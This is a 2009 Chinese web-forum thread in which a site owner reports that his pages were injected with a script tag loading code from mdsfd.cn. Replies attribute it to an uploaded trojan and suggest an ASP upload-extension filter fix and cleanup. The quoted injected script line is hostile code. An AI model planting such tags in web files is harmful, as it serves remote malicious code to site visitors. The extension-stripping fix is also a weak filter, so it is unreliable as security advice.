vlonzhu 发表于 2009-3-23 12:34:30

我的网站又被挂马了。3月23日

http://www.zjkzhaopin.com

所有的。js文件和index。asp和top.asp文件。

Templates/Default/中的.html文件

后面都被添加

<scriptsrc=http://mdsfd.cn></script>
<scriptsrc=http://mdsfd.cn></script>
<scriptsrc=http://mdsfd.cn></script>
<scriptsrc=http://mdsfd.cn></script>
<scriptsrc=http://mdsfd.cn></script>

求正解,着急。

dillong 发表于 2009-3-23 13:20:45

不会吧。又被挂了??/呵呵。

admin 发表于 2009-3-23 18:17:22

这个挂马是你网站里边被上传了木马文件,然后木马文件批量挂马

vlonzhu 发表于 2009-3-24 13:49:09

管理员,如何避免这类事情的发生呢?

zhoueh888 发表于 2009-3-24 15:20:45

应该是那个编辑器里面的upload.asp里面代码去改一下。
找到里面代码sAllowExt = Replace(UCase(sAllowExt), \"ASP\", \"\")这一段,把他改成
sAllowExt = UCase(sAllowExt)
        Do While InStr(sAllowExt, \"ASP\") or InStr(sAllowExt, \"CER\") or InStr(sAllowExt, \"ASA\") or InStr(sAllowExt, \"CDX\") or InStr(sAllowExt, \"HTR\") Or InStr(sAllowExt, \"ASPX\")
         sAllowExt = Replace(sAllowExt, \"ASP\", \"\")
         sAllowExt = Replace(sAllowExt, \"CER\", \"\")
         sAllowExt = Replace(sAllowExt, \"ASA\", \"\")
         sAllowExt = Replace(sAllowExt, \"CDX\", \"\")
         sAllowExt = Replace(sAllowExt, \"HTR\", \"\")
         sAllowExt = Replace(sAllowExt, \"ASPX\", \"\")
   Loop

这样应该就不会了。当然你不能断定如果你自己改了代码,正好有漏洞,那就不知道了。

zhoueh888 发表于 2009-3-24 15:22:37

忘了说一句,你要先找到上传到你空间上面的木马文件,一般是在上传文件的目录里面,你去找找看,是不是有什么后缀是asa、asp、aspx等之类的文件,下载下来看看,全部删掉。

yaya725 发表于 2009-3-24 16:04:48

页: [1]
查看完整版本: 我的网站又被挂马了。3月23日